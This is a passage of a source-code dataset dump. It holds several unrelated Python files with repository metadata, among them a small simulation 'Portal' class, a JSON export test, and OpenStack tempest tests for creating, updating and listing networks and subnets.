_pyangbind_elements = {'secpath_name': secpath_name, 'secpath_standby': secpath_standby, 'secpath_bfd': secpath_bfd, 'secpath_cspf': secpath_cspf, 'secpath_ipmtu': secpath_ipmtu, 'lsp_adaptive': lsp_adaptive, 'lsp_reoptimize_timer': lsp_reoptimize_timer, 'lsp_commit': lsp_commit, 'lsp_record': lsp_record, 'lsp_cos': lsp_cos, 'lsp_hop_limit': lsp_hop_limit, 'lsp_cspf_computation_mode': lsp_cspf_computation_mode, 'lsp_traffic_engineering': lsp_traffic_engineering, 'priority': priority, 'lsp_exclude_any': lsp_exclude_any, 'lsp_include_any': lsp_include_any, 'lsp_include_all': lsp_include_all, 'secpath_soft_preemption': secpath_soft_preemption, 'lsp_secpath_auto_bandwidth': lsp_secpath_auto_bandwidth, }
| true
| true
|
1c446db459b8ff21bcf05a909d7da4d5e1444764
| 2,724
|
py
|
Python
|
panzoto/portal.py
|
yangliu2/panzoto
|
86fb0e6ab26a682b360dd45394f894fa03b5d433
|
[
"MIT"
] | null | null | null |
panzoto/portal.py
|
yangliu2/panzoto
|
86fb0e6ab26a682b360dd45394f894fa03b5d433
|
[
"MIT"
] | null | null | null |
panzoto/portal.py
|
yangliu2/panzoto
|
86fb0e6ab26a682b360dd45394f894fa03b5d433
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pickle
from rich.table import Table
from rich import box
from rich.console import Console
from typing import Callable, Dict
import panzoto.config as CFG
from panzoto.matrix import Matrix
from panzoto.utils import load_matrix, log_output, timer
class Portal():
def __init__(self):
# load Matrix
if Path(CFG.default_matrix).exists():
self.matrix = load_matrix()
else:
self.matrix = Matrix()
# load commands
self.commands = self.load_commands()
@timer
def save_matrix(self,
save_path: str = CFG.default_matrix) -> None:
"""Save the world data in a pickle file
Args:
save_path (str, optional): save matrix file path.
Defaults to CFG.default_matrix.
"""
file_path = Path(save_path)
if not file_path.parent.exists():
Path(file_path.parent).mkdir(parents=True, exist_ok=True)
with open(file_path, 'wb') as handle:
pickle.dump(self.matrix,
handle,
protocol=pickle.HIGHEST_PROTOCOL)
def load_commands(self) -> Dict[str, Callable]:
"""Lists of commands
Returns:
Dict: dict of commands, {command: function to call}
"""
commands = {
# create_person <first name> <last name>
'create_person': self.matrix.create_person,
'create_people': self.matrix.create_people,
'create_child': self.matrix.create_child,
'remove_person': self.matrix.delete_person,
'list_people': self.matrix.list_people,
'create_food': self.matrix.create_food,
'remove_item': self.matrix.delete_thing,
'assign': self.matrix.assign_item,
'list_items': self.matrix.list_things,
'run_turns': self.matrix.run_n_turn,
'focus': self.matrix.focus,
'show_stats': self.matrix.show_stats,
'show_records': self.matrix.show_records,
'graph_stats': self.matrix.graph_stats,
'help': self.show_commands
}
return commands
def show_commands(self) -> str:
"""Display a list of commands
Returns:
str: output string
"""
output = ""
commands = self.load_commands()
table = Table(title="Matrix Commands", box=box.ROUNDED)
table.add_column("Commands",
justify="left",
style="cyan")
for key in commands:
table.add_row(key)
console = Console()
console.print(table)
return output
| 30.954545
| 69
| 0.579295
|
from pathlib import Path
import pickle
from rich.table import Table
from rich import box
from rich.console import Console
from typing import Callable, Dict
import panzoto.config as CFG
from panzoto.matrix import Matrix
from panzoto.utils import load_matrix, log_output, timer
class Portal():
def __init__(self):
if Path(CFG.default_matrix).exists():
self.matrix = load_matrix()
else:
self.matrix = Matrix()
self.commands = self.load_commands()
@timer
def save_matrix(self,
save_path: str = CFG.default_matrix) -> None:
file_path = Path(save_path)
if not file_path.parent.exists():
Path(file_path.parent).mkdir(parents=True, exist_ok=True)
with open(file_path, 'wb') as handle:
pickle.dump(self.matrix,
handle,
protocol=pickle.HIGHEST_PROTOCOL)
def load_commands(self) -> Dict[str, Callable]:
commands = {
'create_person': self.matrix.create_person,
'create_people': self.matrix.create_people,
'create_child': self.matrix.create_child,
'remove_person': self.matrix.delete_person,
'list_people': self.matrix.list_people,
'create_food': self.matrix.create_food,
'remove_item': self.matrix.delete_thing,
'assign': self.matrix.assign_item,
'list_items': self.matrix.list_things,
'run_turns': self.matrix.run_n_turn,
'focus': self.matrix.focus,
'show_stats': self.matrix.show_stats,
'show_records': self.matrix.show_records,
'graph_stats': self.matrix.graph_stats,
'help': self.show_commands
}
return commands
def show_commands(self) -> str:
output = ""
commands = self.load_commands()
table = Table(title="Matrix Commands", box=box.ROUNDED)
table.add_column("Commands",
justify="left",
style="cyan")
for key in commands:
table.add_row(key)
console = Console()
console.print(table)
return output
| true
| true
|
1c446e092f59a795f8241b05d24a122a84ab3529
| 100
|
py
|
Python
|
app/domain/exceptions.py
|
globocom/enforcement
|
004ff545d6d61b95b555d9981525510496862b3e
|
[
"BSD-3-Clause"
] | 7
|
2020-11-08T18:02:26.000Z
|
2021-10-15T21:40:35.000Z
|
app/domain/exceptions.py
|
globocom/enforcement
|
004ff545d6d61b95b555d9981525510496862b3e
|
[
"BSD-3-Clause"
] | 19
|
2020-11-19T20:57:20.000Z
|
2021-09-03T14:53:34.000Z
|
app/domain/exceptions.py
|
globocom/enforcement-service
|
004ff545d6d61b95b555d9981525510496862b3e
|
[
"BSD-3-Clause"
] | 3
|
2020-10-03T02:40:34.000Z
|
2020-10-19T10:17:06.000Z
|
class EnforcementInvalidException(Exception):
pass
class SecretNotFound(Exception):
pass
| 12.5
| 45
| 0.77
|
class EnforcementInvalidException(Exception):
pass
class SecretNotFound(Exception):
pass
| true
| true
|
1c446e1ef19c9f608c436ef3bdb84329213f98ad
| 1,496
|
py
|
Python
|
tests/json/test_jsonexportfile.py
|
aaronater10/sfconfig
|
f1ebd0a4dc5e6ec235d30b0ef1540fb65422729a
|
[
"MIT"
] | null | null | null |
tests/json/test_jsonexportfile.py
|
aaronater10/sfconfig
|
f1ebd0a4dc5e6ec235d30b0ef1540fb65422729a
|
[
"MIT"
] | null | null | null |
tests/json/test_jsonexportfile.py
|
aaronater10/sfconfig
|
f1ebd0a4dc5e6ec235d30b0ef1540fb65422729a
|
[
"MIT"
] | null | null | null |
# jsonexportfile - Tests
from src import sfcparse
from os import remove, path
import time
test_file_path = './tests/test_files/json/'
file_delay_timer = 0.5
################################################################
# TESTS
# 1. JSON Data Export - Exporting json file data and test attributes
def test1_json_file_export():
filename = '1_export_data.json'
filepath = test_file_path + filename
json_data = {
'string_data': 'data',
'int_data': 256,
'array_data': [1,2,3],
'bool_data': True,
'null_data': None
}
# Remove Any Existing Test File
try: remove(filepath)
except: pass
time.sleep(file_delay_timer)
# Test Not Exist, Create, Exist, test data and it's Type
assert not path.exists(filepath)
sfcparse.jsonexportfile(filepath, json_data)
assert path.exists(filepath)
json_import = sfcparse.jsonimportfile(filepath)
assert (json_import['string_data'] == 'data') and (isinstance(json_import['string_data'], str))
assert (json_import['int_data'] == 256) and (isinstance(json_import['int_data'], int))
assert (json_import['array_data'] == [1,2,3]) and (isinstance(json_import['array_data'], list))
assert (json_import['bool_data'] == True) and (isinstance(json_import['bool_data'], bool))
assert (json_import['null_data'] == None) and (isinstance(json_import['null_data'], type(None)))
# Remove Test File
time.sleep(file_delay_timer)
try: remove(filepath)
except: pass
| 32.521739
| 100
| 0.661096
|
from src import sfcparse
from os import remove, path
import time
test_file_path = './tests/test_files/json/'
file_delay_timer = 0.5
| true
| true
|
1c446eff4ecb46549266af14ca2384810a90480b
| 29,182
|
py
|
Python
|
tempest/api/network/test_networks.py
|
xavpaice/tempest
|
958bd694df27511e0346d799876fe49331b8145c
|
[
"Apache-2.0"
] | null | null | null |
tempest/api/network/test_networks.py
|
xavpaice/tempest
|
958bd694df27511e0346d799876fe49331b8145c
|
[
"Apache-2.0"
] | null | null | null |
tempest/api/network/test_networks.py
|
xavpaice/tempest
|
958bd694df27511e0346d799876fe49331b8145c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
import six
from tempest_lib import exceptions as lib_exc
from tempest.api.network import base
from tempest.common import custom_matchers
from tempest.common.utils import data_utils
from tempest import config
from tempest import test
CONF = config.CONF
class NetworksTest(base.BaseNetworkTest):
"""Tests the following operations in the Neutron API:
create a network for a tenant
list tenant's networks
show a tenant network details
create a subnet for a tenant
list tenant's subnets
show a tenant subnet details
network update
subnet update
delete a network also deletes its subnets
list external networks
All subnet tests are run once with ipv4 and once with ipv6.
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant ipv4 subnets
tenant_network_v6_cidr is the equivalent for ipv6 subnets
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
tenant_network_v6_mask_bits is the equivalent for ipv6 subnets
"""
@classmethod
def resource_setup(cls):
super(NetworksTest, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
def _create_subnet_with_last_subnet_block(cls, network, ip_version):
# Derive last subnet CIDR block from tenant CIDR and
# create the subnet with that derived CIDR
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
"""Return first subnet gateway for configured CIDR """
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
"""Return allocation range for subnet of given gateway"""
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
# Return a subnet dict which has include_keys and their corresponding
# value from self._subnet_data
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
# Deleting network also deletes its subnets if exists
self.networks_client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.networks_client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
# Create a network
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
# Verify network update
new_name = "New_network"
body = self.networks_client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Verify subnet update
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
# Verify the details of a network
body = self.networks_client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name']:
self.assertEqual(network[key], self.network[key])
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
# Verify specific fields of a network
fields = ['id', 'name']
body = self.networks_client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
# Verify the network exists in the list of all networks
body = self.networks_client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
# Verify specific fields of the networks
fields = ['id', 'name']
body = self.networks_client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
# Verify the details of a subnet
body = self.subnets_client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
# Verify specific fields of a subnet
fields = ['id', 'network_id']
body = self.subnets_client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
# Verify the subnet exists in the list of all subnets
body = self.subnets_client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
# Verify specific fields of subnets
fields = ['id', 'network_id']
body = self.subnets_client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
# delete network, if it exists
try:
self.networks_client.delete_network(net_id)
# if network is not found, this means it was deleted in the test
except lib_exc.NotFound:
pass
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
# Creates a network
name = data_utils.rand_name('network-')
body = self.networks_client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Delete network while the subnet still exists
body = self.networks_client.delete_network(net_id)
# Verify that the subnet got automatically deleted.
self.assertRaises(lib_exc.NotFound, self.subnets_client.show_subnet,
subnet_id)
# Since create_subnet adds the subnet to the delete list, and it is
# is actually deleted here - this will create and issue, hence remove
# it from the list.
self.subnets.pop()
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
# Verify subnet update
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
"""Verifies user can see external networks but not subnets."""
body = self.networks_client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets']
for network in body['networks']
if not network['shared'])
# subnets_iter is a list (iterator) of lists. This flattens it to a
# list of UUIDs
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
"""Tests the following operations in the Neutron API:
bulk network creation
bulk subnet creation
bulk port creation
list tenant's networks
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant networks
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant-network_cidr
"""
def _delete_networks(self, created_networks):
for n in created_networks:
self.networks_client.delete_network(n['id'])
# Asserting that the networks are not found in the list after deletion
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.subnets_client.delete_subnet(n['id'])
# Asserting that the subnets are not found in the list after deletion
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.ports_client.delete_port(n['id'])
# Asserting that the ports are not found in the list after deletion
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
# Creates 2 networks in one request
network_list = [{'name': data_utils.rand_name('network-')},
{'name': data_utils.rand_name('network-')}]
body = self.client.create_bulk_network(networks=network_list)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
# Asserting that the networks are found in the list after creation
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 subnets in one request
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets=subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
# Asserting that the subnets are found in the list after creation
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 ports in one request
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(ports=port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
# Asserting that the ports are found in the list after creation
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTest):
_ip_version = 6
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway)
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
# Verifies Subnet GW is set in IPv6
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
# Verifies Subnet GW is None in IPv4
self.assertEqual(subnet2['gateway_ip'], None)
# Verifies all 2 subnets in the same network
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
self.assertItemsEqual(subnets,
test_subnet_ids,
'Subnet are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def skip_checks(cls):
super(NetworksIpV6TestAttrs, cls).skip_checks()
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
"""Create subnet and delete it with existing ports"""
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.subnets_client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.subnets_client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.networks_client.delete_network,
slaac_network['id'])
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
"""Test deleting subnet with SLAAC ports
Create subnet with SLAAC, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("slaac")
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
def test_create_delete_stateless_subnet_with_ports(self):
"""Test deleting subnet with DHCPv6 stateless ports
Create subnet with DHCPv6 stateless, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| 44.964561
| 79
| 0.628675
|
import itertools
import netaddr
import six
from tempest_lib import exceptions as lib_exc
from tempest.api.network import base
from tempest.common import custom_matchers
from tempest.common.utils import data_utils
from tempest import config
from tempest import test
CONF = config.CONF
class NetworksTest(base.BaseNetworkTest):
@classmethod
def resource_setup(cls):
super(NetworksTest, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
